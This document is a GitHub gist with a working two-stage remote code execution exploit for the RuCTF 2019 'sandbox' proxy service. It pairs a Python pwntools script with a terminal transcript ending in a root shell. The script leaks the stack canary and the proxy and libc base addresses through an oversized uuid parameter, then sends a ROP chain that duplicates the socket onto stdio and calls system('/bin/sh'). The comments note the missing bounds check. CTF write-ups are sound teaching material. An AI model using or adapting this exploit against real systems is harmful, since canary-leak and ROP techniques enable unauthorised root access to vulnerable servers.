@v0s
Last active April 30, 2019 05:28
Sandbox ROP RCE (ructf 2019)

Sandbox RCE via ROP

root@kali:/mnt/hgfs/f/sandbox/proxy# ./sandbox_rce.py 
[+] Opening connection to 127.0.0.1 on port 16780: Done
[*] Closed connection to 127.0.0.1 port 16780
[+] Opening connection to 127.0.0.1 on port 16780: Done
Stack canary: 00667104293168fb proxy base: 0x5611dcb23000 libc base: 0x7ff23c8f9000
[*] Switching to interactive mode
foo\x00uuid\x0041414141414141414141414sh: turning off NDELAY mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$ pwd
/root/proxy
$ ls -la
total 8140
drwxr-xr-x 1 root root      4096 Apr 29 21:49 .
drwx------ 1 root root      4096 Apr 29 21:45 ..
-rwxrwxrwx 1 root root        46 Apr 28 14:13 .gitignore
-rwxrwxrwx 1 root root       168 Apr 28 14:13 Dockerfile
-rwxrwxrwx 1 root root       494 Apr 28 14:13 Makefile
-rwxrwxrwx 1 root root       103 Apr 28 14:13 docker_build.sh
-rwxrwxrwx 1 root root       288 Apr 28 14:13 gen_hash.py
-rwxrwxrwx 1 root root        28 Apr 28 14:13 hash.h
-rwxrwxrwx 1 root root      8267 Apr 28 14:13 httpserver.cpp
-rwxrwxrwx 1 root root      4619 Apr 28 14:13 httpserver.h
-rwxrwxrwx 1 root root       569 Apr 28 14:13 interface.h
-rwxr-xr-x 1 root root   2030544 Apr 29 21:45 libc.so.6
-rwxrwxrwx 1 root root     30768 Apr 29 17:31 libinterface.so
-rwxrwxrwx 1 root root      4302 Apr 28 14:13 main.cpp
-rwxrwxrwx 1 root root    452976 Apr 28 14:20 proxy
$  
#!/usr/bin/python
# Python 2 pwntools script (print statement, str-based byte concatenation);
# it will not run unmodified under Python 3.
#
# Proof of concept for the "sandbox" proxy service (ructf 2019): two HTTP
# requests to /add_unit.  The first sends an oversized `uuid` value and reads
# the response, from which a stack canary and two code pointers are sliced;
# the second sends a payload that re-uses the leaked canary and appends a ROP
# chain.  Every offset below (0x3C3D, 0x130EA6, the gadget and symbol
# offsets) is tied to the exact proxy and libc.so.6 builds listed in the
# transcript above, so the script only works against that deployment.
#
# From a defensive reading: the canary and ASLR are both in place on this
# target but give no protection once the same over-long input discloses the
# canary and code pointers; bounds-checking the `uuid` parameter before it is
# copied into the stack buffer is the fix (the vulnerable copy is not shown
# on this page, so this is inferred from the payload layout).
from pwn import *
# HOST/PORT come from pwntools' `args` (script.py HOST=... PORT=...);
# defaults target a local instance, as in the transcript above.
host = args.HOST or "127.0.0.1"
port = args.PORT or "16780"
io = remote(host, port)
# Stage 1 payload: 52 filler bytes, a 4-byte value 4, 4 more filler bytes,
# then 0x3ff.  Presumably the last field is a length that makes the server
# echo back more of the stack than intended — TODO confirm against main.cpp.
payload = "A"*52 + p32(4) + "A"*4 + p64(0x3ff)
# The payload travels hex-encoded in the query string (uppercase hex).
io.send("POST /add_unit?mind=foo&uuid=" + enhex(payload).upper() + " HTTP/1.1\r\n"
+ "Host: 127.0.0.1:16780\r\n"
+ "User-Agent: curl/7.64.0\r\n"
+ "Accept: */*\r\n"
+ "Content-Length: 0\r\n"
+ "\r\n")
# Collect the whole response for up to 0x400 seconds (recvrepeat's argument is a timeout).
leak = io.recvrepeat(0x400)
io.close()
# Fresh connection for stage 2; the canary/base values are reused across
# connections, so the server must keep the same process (same ASLR layout).
io = remote(host, port)
# Fixed slice offsets into the leaked bytes: canary, a proxy text pointer,
# a libc text pointer.  The subtracted constants are the known offsets of
# those pointers inside the respective binaries.
stack_canary = leak[0x48:0x50]
proxyBase = u64(leak[0x58:0x60]) - 0x3C3D
libcBase = u64(leak[0x2c8:0x2d0]) - 0x130EA6
print "Stack canary:", enhex(stack_canary), "proxy base:", hex(proxyBase), "libc base:", hex(libcBase)
# ROP chain (per the author's gadget comments): dup2(4, 0), dup2(4, 1),
# dup2(4, 2), then system("/bin/sh").  fd 4 is presumably the client
# socket so the shell's stdio is attached to this connection — not stated
# on the page.
rop = ""
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(4)
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found)
rop += p64(0)
rop += p64(libcBase + 0x1109A0)#dup2
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(4)
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found)
rop += p64(1)
rop += p64(libcBase + 0x1109A0)#dup2
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(4)
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found)
rop += p64(2)
rop += p64(libcBase + 0x1109A0)#dup2
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(libcBase + 0x01B3E9A)#"/bin/sh"
rop += p64(libcBase + 0x4F440)#system
# Stage 2 payload: same prefix as stage 1 but with the length field set to
# 0, then the leaked canary in its original slot (so the canary check
# passes), 8 bytes of saved-rbp filler, and the chain in place of the
# return address.
payload = "A"*52 + p32(4) + "A"*4 + p64(0) + stack_canary + "B"*8 + rop
io.send("POST /add_unit?mind=foo&uuid=" + enhex(payload).upper() + " HTTP/1.1\r\n"
+ "Host: 127.0.0.1:16780\r\n"
+ "User-Agent: curl/7.64.0\r\n"
+ "Accept: */*\r\n"
+ "Content-Length: 0\r\n"
+ "\r\n")
# Hand the connection to the user (the "$ id" session in the transcript above).
io.interactive()
@RuslanKutdusov

Агонь!
